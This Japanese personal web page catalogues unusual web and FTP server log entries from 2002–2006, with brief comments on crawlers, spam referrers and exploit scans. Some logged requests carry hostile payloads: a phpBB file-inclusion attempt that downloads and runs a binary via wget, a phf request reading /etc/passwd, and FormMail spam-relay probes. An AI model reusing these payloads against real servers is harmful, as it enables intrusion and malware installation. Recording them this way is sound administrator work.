I&U Home > うにまま(仮) ・ 謎ログの友 ・ パスワードコレクション ・ FormMail Scanners
all [apache] [exploit] [ftp] [robot] [webalizer] [SEO_SPAM] [others]
検索エンジンはなぜ usage/bookmarks を探すのか?
msnbot/0.11 (+http://search.msn.com/msnbot.htm)
"GET /scripts/nsiislog.dll" - MS03-019の脆弱性を狙った攻撃
"CONNECT 1.3.3.7:1337 HTTP/1.0"
"GET /cfdocs/expeval/ExprCalc.cfm" Cold Fusion のサンプルスクリプトを狙った攻撃
Microsoft URL Control - 6.00.8862
謎ログ index
Name: 69-56-146-210.theplanet.com
Address: 69.56.146.210
69.56.146.210 - - [01/Mar/2006:05:41:08 +0900] "POST /xmlrpc.php HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
69.56.146.210 - - [01/Mar/2006:05:41:09 +0900] "POST /blog/xmlrpc.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
83.17.221.182 - - [21/Feb/2006:04:26:00 +0900] "GET /phpmyadmin/main.php HTTP/1.0" 404 291 "-" "-"
83.17.221.182 - - [21/Feb/2006:04:37:12 +0900] "GET /web/phpMyAdmin/main.php HTTP/1.0" 404 295 "-" "-"
221.25.90.15 - - [20/Feb/2006:03:24:31 +0900] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 337 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
221.25.90.15 - - [20/Feb/2006:03:24:32 +0900] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/1.1" 404 329 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
24.12.104.213 - - [12/Feb/2006:00:08:43 +0900] "POST /cgi-bin/formmail.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; DigExt)"
24.12.104.213 - - [12/Feb/2006:00:47:59 +0900] "POST /cgi-bin/formmail.pl HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; DigExt)"
pl1051.nas926.o-tokyo.nttpc.ne.jp - - [29/Dec/2003:02:00:39 +0900] "GET /mokko/w64_06.gif HTTP/1.1" 200 1838 "http://inazuma/content?Type=Data&KIND=&PARAM=&QUERY=網戸+張替え&WATCH=&EXTRA=&URL=http://iandu.s7.xrea.com/mokko/amido.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
pl1051.nas926.o-tokyo.nttpc.ne.jp - - [29/Dec/2003:02:00:39 +0900] "GET /mokko/arrowu_1.gif HTTP/1.1" 200 944 "http://inazuma/content?Type=Data&KIND=&PARAM=&QUERY=網戸+張替え&WATCH=&EXTRA=&URL=http://iandu.s7.xrea.com/mokko/amido.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
a212-113-164-98.netcabo.pt - - [27/Dec/2003:06:40:33 +0900] "POST /_vti_bin/_vti_aut/author.exe HTTP/1.0" 302 210 "-" "MSFrontPage/4.0"
a212-113-164-98.netcabo.pt - - [27/Dec/2003:06:40:33 +0900] "POST /_vti_bin/_vti_aut/author.exe HTTP/1.0" 302 210 "-" "MSFrontPage/4.0"
216.88.158.142 - - [25/Dec/2003:00:51:29 +0900] "GET /~genome/links.html HTTP/1.1" 200 6280 "-" "Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)"
64.239.138.76 - - [25/Dec/2003:04:52:10 +0900] "GET / HTTP/1.1" 200 1427 "backlinks.seguru.net/?link-popularity" "Mozilla/5.0 (compatible; Konqueror/2.2.2; Linux 2.2.19; i686)"
202.229.44.68 - - [15/Dec/2003:10:48:13 +0900] "GET /%7Emyhome/index.html HTTP/1.0" 200 2506 "-" "Wget/1.8.2"
193.55.10.104 - - [02/Dec/2003:01:30:43 +0900] "GET /~ppp/pppkey.html HTTP/1.0" 200 3736 "bookmarks" "Mozilla/4.5 [fr] (Macintosh; U; PPC)"host)
133.39.9.117 - - [06/Dec/2003:18:56:15 +0900] "GET /%7Eggggg/index.html HTTP/1.0" 200 2080 "bookmarks" "Mozilla/4.7 [ja] (Macintosh; U; PPC)"
adsl-211-228-28.mia.bellsouth.net - - [22/Nov/2003:15:47:54 +0900] "GET /unimama/logwatch.html HTTP/1.1" 200 101684 "-" "nyuspswpddxWmuskco dityxp"
adsl-211-228-28.mia.bellsouth.net - - [22/Nov/2003:17:56:16 +0900] "GET /unimama/logwatch.html HTTP/1.1" 200 101684 "-" "leymisgaoVmjsnxb lbmocpsiqsaVi"
wooster.netcraft.com - - [19/Nov/2003:22:30:51 +0900] "HEAD / HTTP/1.1" 200 0 "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"
wooster.netcraft.com - - [19/Nov/2003:22:30:55 +0900] "HEAD /xyzzy HTTP/1.0" 302 0 "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"
141.85.3.130 - - [17/Nov/2003:04:34:29 +0900] "GET / HTTP/1.0" 200 955 "http://www.saulem.com/" "MSIE 6.0"
141.85.3.130 - - [17/Nov/2003:11:10:10 +0900] "GET / HTTP/1.0" 200 955 "http://www.bongohome.com/" "MSIE 6.0"
195.93.32.8 - - [17/Nov/2003:00:59:35 +0900] "GET /~tttt/html/TT5.dmel0.mas.135.html HTTP/1.0" 200 2912 "XXXX:++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++" "Mozilla/4.0 (compatible; MSIE 5.5; AOL 8.0; Windows NT 5.0; FunWebProducts)"
Nov 17 11:43:15 myhost ftpd[25380]: FTPD: connection from defense-4-81-57-92-161.fbx.proxa at Mon Nov 17 11:43:15 2003
Nov 17 11:43:15 myhost ftpd[25380]: <--- 220
219.117.176.252 - - [16/Nov/2003:00:21:50 +0900] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
219.117.176.252 - - [16/Nov/2003:00:21:50 +0900] "OPTIONS /%7Eppp HTTP/1.1" 301 322 "-" "Microsoft Data Access Internet Publishing Provider Protocol Discovery"
216.39.48.112 - - [25/Oct/2003:12:10:43 +0900] "GET /~ppp/usage/bookmarks HTTP/1.1" 404 301 "-" "Scooter/3.2"
64.68.82.170 - - [25/Oct/2003:19:19:10 +0900] "GET /~ppp/usage/bookmarks HTTP/1.0" 404 289 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
204.95.98.252 - - [04/Nov/2003:04:04:04 +0900] "GET /%7Eggggg/mailto/:gggg-admin/@mydomain.xxx.xxx.xxx.xxx HTTP/1.0" 404 321 "-" "msnbot/0.11 (+http://search.msn.com/msnbot.htm)"
211.152.11.8 - - [02/Nov/2003:00:45:37 +0900] "GET /images2001/regobauble-b.gif HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
211.152.11.8 - - [02/Nov/2003:01:43:45 +0900] "GET /images2001/clear.gif HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
128.255.116.124 - - [09/Oct/2003:01:30:44 +0900] "GET /~ppp/cgi-bin/PPP/PPPseqen.pl.cgi?A900534 > PPP_SEQUENCES/A900534.txt" 400 377 "-" "-"
128.255.116.124 - - [09/Oct/2003:01:30:44 +0900] "GET /~ppp/cgi-bin/PPP/PPPseqen.pl.cgi?A900756 > PPP_SEQUENCES/A900756.txt" 400 377 "-" "-"
Oct 8 23:57:25 myhost ftpd[12560]: FTPD: connection from pD9E40E3F.dip.t-dialin.net at Wed Oct 8 23:57:25 2003
Oct 8 23:57:25 myhost ftpd[12560]: <--- 220
203.162.167.98 - - [02/Oct/2003:14:18:16 +0900] "GET /unimama/httpscan.txt HTTP/1.0" 200 30853 "http://www.google.com.vn/search?q=PDG_Cart/order.log&hl=vi&lr=&ie=UTF-8&start=70&sa=N" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
203.162.167.98 - - [02/Oct/2003:14:19:34 +0900] "GET /cgi-bin/adpassword.txt HTTP/1.0" 302 210 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
217.187.217.152 - - [30/Sep/2003:13:35:20 +0900] "GET /jf74kd HTTP/1.0" 404 278 "-" "-"
Sep 30 06:11:39 myhost ftpd[9226]: FTPD: connection from gate2.sssss.org at Tue Sep 30 06:11:39 2003
Sep 30 06:11:39 myhost ftpd[9226]: <--- 220
210.51.181.114 - - [06/Sep/2003:16:12:55 +0900] "\x04\x01" 501 - "-" "-"
210.51.181.114 - - [06/Sep/2003:16:13:15 +0900] "\x05\x01" 501 - "-" "-"
212.179.35.101 - - [02/Sep/2003:09:47:05 +0900] "GET / HTTP/1.0" 200 3923 "-" "-"
212.179.35.101 - - [02/Sep/2003:09:47:05 +0900] "GET / HTTP/1.0" 200 3923 "-" "-"
219.140.57.34 - - [30/Aug/2003:11:36:49 +0900] "GET /+AH4-ggg/cgi-bin/IMG/lblue.gif HTTP/1.1" 404 317 "http://mydomain.xxx.xxx.xxx/~ggg/cgi-bin/mas.pl.cgi?org=anab0&gene=icd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
219.140.57.34 - - [30/Aug/2003:11:36:49 +0900] "GET /+AH4-ggg/cgi-bin/IMG/blue.gif HTTP/1.1" 404 316 "http://mydomain.xxx.xxx.xxx/~ggg/cgi-bin/mas.pl.cgi?org=anab0&gene=icd" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
66.150.40.66 - - [21/Aug/2003:02:11:37 +0900] "HEAD / HTTP/1.1" 200 0 "-" "sitecheck.internetseer.com (For more info see: http://sitecheck.internetseer.com)"
66.150.40.76 - - [19/Aug/2003:16:30:53 +0900] "GET /robots.txt HTTP/1.1" 200 187 "-" "sitecheck.internetseer.com (For more info see: http://sitecheck.internetseer.com)"
24.123.170.99 - - [08/Aug/2003:07:27:47 +0900] "GET /NULL.printer" 404 - "-" "-"
212.123.66.62 - - [04/Aug/2003:12:56:10 +0900] "GET /~ppp/usage/usage_200307.html HTTP/1.1" 200 0 "http://www.top-penis-enlargement.com/" "Mozilla/2.0 (compatible; MSIE 3.0; AOL 4.0; Windows 3.1)"
211.114.118.254 - - [04/Aug/2003:12:57:50 +0900] "GET /~ppp/usage/usage_200307.html HTTP/1.0" 200 0 "http://www.top-penis-enlargement.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
Webalizerで先月のログを眺めてみると、通常月より1万ヒットくらい多かった。はて?
210.155.159.198 - - [05/Aug/2003:13:46:54 +0900] "GET /~ggggg/ftp.embl-ebi.ac.uk/pub/databases/ HTTP/1.0" 404 313 "-" "Infoseek SideWinder/2.0B (Linux 2.4 i686)"
12.218.107.176 - - [04/Aug/2003:18:28:57 +0900] "CONNECT smtp.rol.ru:25 HTTP/1.0" 405 309 "-" "-"
12.218.107.176 - - [04/Aug/2003:18:28:59 +0900] "CONNECT smtp.rol.ru:25 HTTP/1.0" 405 309 "-" "-"
61.214.65.109 - - [31/Jul/2003:20:54:12 +0900] "GET /sssss~/ HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
61.214.65.109 - - [31/Jul/2003:20:55:41 +0900] "GET /sssss~pub/ HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
211.181.212.10 - - [16/Jul/2003:08:56:32 +0900] "GET /scripts/nsiislog.dll" 404 - "-" "-"
80.139.104.127 - - [21/Jul/2003:10:47:04 +0900] "GET /scripts/nsiislog.dll" 404 - "-" "-"
212.92.77.254 - - [24/Jul/2003:01:31:16 +0900] "GET / HTTP/1.1" 200 3923 "-" "libwhisker/1.6"
212.92.77.254 - - [24/Jul/2003:01:31:17 +0900] "GET /Nikto-1.30-nexWS82JrkAwEdao7u.htm HTTP/1.1" 404 317 "-" "Mozilla/4.75 (Nikto/1.30 )"
142.177.228.186 - - [22/Jul/2003:17:28:26 +0900] "GET http://blackmarket.jp/cgi-bin/jeno/env/prxjdg.cgi HTTP/1.0" 404 299 "-" "Mozilla/3.0 (compatible)"
142.177.228.186 - - [22/Jul/2003:22:59:30 +0900] "GET http://blackmarket.jp/cgi-bin/jeno/env/prxjdg.cgi HTTP/1.0" 404 299 "-" "Mozilla/3.0 (compatible)"
217.162.194.164 - - [17/Jul/2003:21:42:02 +0900] "GET / HTTP/1.0" 200 3923 "-" "-"
217.162.194.164 - - [17/Jul/2003:21:42:05 +0900] "GET /index.php HTTP/1.0" 404 281 "-" "-"
Jul 20 06:35:25 myhost in.ftpd[5713]: connect from 80.178.5.154
Jul 20 06:35:36 myhost in.ftpd[5716]: connect from 80.178.5.154.forward.012.net.il
210.196.71.179 - - [15/Jul/2003:13:46:52 +0900] "CONNECT 1.3.3.7:1337 HTTP/1.0"405 309 "-" "-"
61.209.171.119 - - [30/Jun/2003:20:32:58 +0900] "GET //r/n. HTTP/1.1" 404 286 "-" "Microsoft URL Control - 6.00.8862"
163.152.159.70 - - [27/Jun/2003:20:47:39 +0900] "LINK / HTTP/1.1" 501 337 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)"
163.152.159.70 - - [28/Jun/2003:12:56:09 +0900] "LINK / HTTP/1.1" 501 337 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Win32)"
"GET /w3c/p3p.xml HTTP/1.1" 404 295 "-" "P3P Client"
212.202.40.10 - - [26/Jun/2003:07:10:26 +0900] "GET /cfdocs/expeval/ExprCalc.cfm HTTP/1.0" 404 299 "-" "-"
211.233.27.208 - - [26/Jun/2003:02:07:56 +0900] "POST /cgi-bin/sendmail.cgi HTTP/1.0" 404 289 "http://mydomain.xxx.xxx.xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q12484)"
192.148.139.178 - - [26/Jun/2003:02:07:56 +0900] "POST /cgi-bin/sendmail.asp HTTP/1.0" 404 289 "http://mydomain.xxx.xxx.xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q12484)"
203.15.69.139 - - [24/Jun/2003:07:17:12 +0900] "SEARCH / HTTP/1.1" 501 344 "-" "-"
Jun 22 09:44:47 myhost ftpd[24002]: FTPD: connection from APlessis-Bouchard-101-2-1-53.w19 at Sun Jun 22 09:44:47 2003
Jun 22 09:44:47 myhost ftpd[24002]: <--- 220
131.107.163.50 - - [01/May/2003:13:57:18 +0900] "GET /~ggg-old/xxxxxx HTTP/1.1" 404 304 "-" "MicrosoftPrototypeCrawler (How's my crawling? mailto:newbiecrawler@hotmail.com)"
131.107.163.50 - - [01/May/2003:13:57:23 +0900] "GET /~ggg-old/yyyyyy HTTP/1.1" 404 304 "-" "MicrosoftPrototypeCrawler (How's my crawling? mailto:newbiecrawler@hotmail.com)"
217.227.77.239 - - [30/Mar/2003:00:11:55 +0900] "HEAD / HTTP/1.0" 200 0 "-" "-"
217.227.77.239 - - [30/Mar/2003:00:11:56 +0900] "GET /.pl HTTP/1.0" 404 275 "-" "-"
218.68.216.7 - - [25/Feb/2003:08:50:09 +0900] "GET http://cancerres.aacrjournals.org/cgi/content/full/63/2/541 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Windows 98)"
218.68.216.7 - - [25/Feb/2003:12:49:06 +0900] "GET http://cancerres.aacrjournals.org/cgi/content/full/63/2/541 HTTP/1.1" 404 309 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Windows 98)"
Feb 11 22:04:16 myhost ftpd[22755]: FTPD: connection from modemcable241.215-130-66.que.mc. at Tue Feb 11 22:04:16 2003
Feb 11 22:04:16 myhost ftpd[22755]: <--- 220
218.145.25.49 - - [31/Dec/2002:21:41:57 +0900] "GET /?action=ad HTTP/1.0" 200 915 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [31/Dec/2002:21:41:57 +0900] "GET /?action=faq HTTP/1.0" 200 915 "-" "dloader(NaverRobot)/1.0"
219.93.206.130 - - [26/Nov/2002:01:43:29 +0900] "GET x HTTP/1.0" 400 334 "-" "-"
211.110.6.220 - - [23/Nov/2002:18:08:13 +0900] "GET /ftp:/mydmain/pub/ppp HTTP/1.1" 404 315 "-" "Microsoft URL Control - 6.00.8862"
211.110.6.220 - - [23/Nov/2002:18:08:56 +0900] "GET /~ppp/ftp:/mydomain/pub/ppp HTTP/1.1" 404 320 "-" "Microsoft URL Control - 6.00.8862"
66.196.72.79 - - [09/Sep/2002:06:43:29 +0900] "-" 408 - "-" "-"
66.196.73.76 - - [09/Sep/2002:08:47:09 +0900] "-" 408 - "-" "-"
208.203.70.195 - - [08/Nov/2002:10:56:37 +0900] "GET /msadc/msadcs.dll HTTP/1.0" 404 288 "-" "-"
208.203.70.195 - - [08/Nov/2002:10:56:38 +0900] "GET /msadc/msadcs.dll HTTP/1.0" 404 288 "-" "-"
Nov 10 14:05:20 myhost ftpd[22995]: FTPD: connection from pc-outside.uni-greifswald.de at Sun Nov 10 14:05:20 2002
Nov 10 14:05:20 myhost ftpd[22995]: <--- 220
粘着くん発見 → ろぐ
Oct 25 03:22:54 myhost ftpd[24850]: FTPD: connection from ca-bordeaux-13-232.abo.wanadoo.f at Fri Oct 25 03:22:54 2002
Oct 25 03:22:54 myhost ftpd[24850]: <--- 220
Oct 10 23:51:59 myhost ftpd[2723]: FTPD: connection from 213.226.134.110 at Thu Oct 10 23:51:59 2002
Oct 10 23:51:59 myhost ftpd[2723]: <--- 220
217.52.46.8 - - [24/Sep/2002:16:25:49 +0900] "GET /scripts/mailto.exe?sendto=bulkcop@yahoo.com&subject=mydomain/scripts/mailto.exe&email=rockstar@mail.com&message=rockstar HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
217.52.46.8 - - [24/Sep/2002:16:25:49 +0900] "GET /cgi-bin/mailto.exe?sendto=bulkcop@yahoo.com&subject=mydomain/cgi-bin/mailto.exe&email=rockstar@mail.com&message=rockstar HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
130.34.78.86 - - [20/Sep/2002:11:29:35 +0900] "GET /~ggggg/favicon.ico HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
130.34.78.86 - - [20/Sep/2002:11:29:35 +0900] "GET /favicon.ico HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
Sep 19 02:15:35 myhost ftpd[2300]: FTPD: connection from pD951ED19.dip.t-dialin.net at Thu Sep 19 02:15:35 2002
80.3.64.5 - - [19/Sep/2002:06:54:41 +0900] "HEAD /cgi-bin/formmail.pl HTTP/1.0" 404 0 "http://mydomain/" "-"
80.3.64.5 - - [19/Sep/2002:06:54:42 +0900] "HEAD /cgi-bin/formmail.cgi HTTP/1.1" 404 0 "http://mydomain/" "-"
211.101.4.15 - - [16/Sep/2002:03:11:51 +0900] "GET /?action=signup HTTP/1.1" 302 298 "-" "Internet Explore 5.x"
211.101.4.15 - - [16/Sep/2002:03:11:51 +0900] "GET /?action=spec HTTP/1.1" 302 298 "-" "Internet Explore 5.x"
68.51.199.14 - - [12/Sep/2002:08:36:15 +0900] "GET /f.sb.gif HTTP/1.1" 404 292 "http://lw4fd.law4.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=365318a02b1caf1a79d75a731f7ec54c&msg=MSG1031786230.22&start=806672&len=2698" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
209.142.168.7 - - [11/Sep/2002:08:22:25 +0900] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 291 "http://gib.genes.nig.ac.jp/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
209.142.168.7 - - [11/Sep/2002:08:22:29 +0900] "GET / HTTP/1.0" 200 3906 "http://mydomain/cgi-bin/formmail.pl" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
Sep 6 06:05:46 myhost ftpd[22667]: FTPD: connection from 217.172.194.74 at Fri Sep 6 06:05:46 2002
Sep 6 06:05:46 myhost ftpd[22667]: <--- 220
長いので適当なところで折り曲げているけど、
218.145.63.93 - - [06/Sep/2002:20:39:21 +0900] "GET /~7Eggggg/ HTTP/1.0" 404 282 "-" "dloader(NaverRobot)/1.0"
ps.melco.co.jp - - [27/Aug/2002:14:24:27 +0900] "GET /spec/server.html HTTP/1.0" 200 2258 "http://www.google.co.jp/search?q=CD-R+CD-RW+Windows2000+Server&hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&start=100&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0; .NET CLR 1.0.3705)"
158.252.215.43 - - [21/Aug/2002:00:34:24 +0900] "CONNECT mx2.mail.yahoo.com:25 HTTP/1.0" 405 309
213.37.58.178 - - [21/Aug/2002:15:35:52 +0900] "GET http://mytest.maddock.net/cgi-bin/myinfo HTTP/1.1" 404 298
ところが、こちらはかなり執拗。14日から17日にかけて31回も接続があった。
最初は IE で、その後はおそらく手動で、そして smartFTP。
この FTP scan の特徴( AFS.TXT と sss@servxxa.com)で検索してみたところ、
"GET /unimama/download.html HTTP/1.1" 200 4084 "http://apple.excite.co.jp/search.gw?target=combined&look=applejp_jp&lang=all&search=Stufflt+Expandar&pref=all"
久しぶりに
"-" 408 -
のログが残っていたのでWebで検索してみたら、こんなのを見つけた。
64.48.129.24 - - [15/Jul/2002:08:03:15 +0900] "POST /cgi-bin/formmail.pl HTTP/1.0" 404 291 64.48.129.24 - - [15/Jul/2002:08:03:19 +0900] "POST /cgi-bin/formmail.cgi HTTP/1.0" 404 292
[09/Jul/2002:10:02:17 +0900] "GET / HTTP/1.0" 200 339 "-" "DoCoMo/1.0/N503i/c10"
IEだけじゃなくって、NN7も favicon.ico を見るようになったらしい
[09/Jul/2002:00:25:19 +0900] "GET /favicon.ico HTTP/1.1" 302 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1"
65.116.145.138 - - [18/Apr/2002:03:13:17 +0900] "GET /%2016945926%2010000%202157 HTTP/1.1" 404 303 65.116.145.138 - - [18/Apr/2002:03:16:41 +0900] "GET /%20185464%2010000%2028 HTTP/1.1" 404 296
formmail.pl/formmail.cgiにセキュリティホールがあるらしい
24.26.60.165 - - [24/Jun/2002:01:17:21 +0900] "GET /cgi-bin/formmail.pl?recipient=ASLEEPYANA@aol.com&subject=http://xxx.xxx.xxx.jp/cgi-bin/formmail.pl&body=JupZ&email=srt@aol.com HTTP/1.1" 404 300 24.26.60.165 - - [24/Jun/2002:01:17:21 +0900] "GET /cgi-bin/formmail.cgi?recipient=ASLEEPYANA@aol.com&subject=http://xxx.xxx.xxx.jp/cgi-bin/formmail.cgi&body=JupZ&email=mim@aol.com HTTP/1.1" 404 301
anonymous@ftp.microsoft.com 続報
| ftpd のログをチェックしていて気づいたのだが、anonymous@ftp.microsoft.com ログと ○gpuser 攻撃(勝手に命名)には関連があるようだ。 |
Mar 10 06:23:37 myhost ftpd[3735]: FTPD: connection from modemcable091.124-202-24.mtl.mc. at Sun Mar 10 06:23:37 2002 Mar 10 06:23:37 myhost ftpd[3735]: <--- 220
やっと判明??? "GET /_vti_bin/owssvr.dll", "GET /MSOffice/cltreq.asp"
"GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 HTTP/1.0" 404 290 "GET /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 HTTP/1.0" 404 290
"GET /pub/ppp HTTP/1.0" 404 278 "GET /pub/ppp HTTP/1.0" 404 278
"GET /phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 274
"GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0 HTTP/1.0" 404 290
"GET x HTTP/1.0" 400 333
きっと '~' (チルダ) だろうけど、何をするとこうなるのかなぁ?
"GET /%E2%80%BEfoo/tools2.html HTTP/1.0" 404 290
"-" 408 -
"..." 501 - "GET HTTP://www.microsoft.com/ HTTP/1.0" 200 3895 (unknown host)
"GET /%EF%BD%9Emydir/zenkoku.html HTTP/1.1" 404 305 "GET /%EF%BD%9Emydir/zenkoku.html HTTP/1.1" 404 305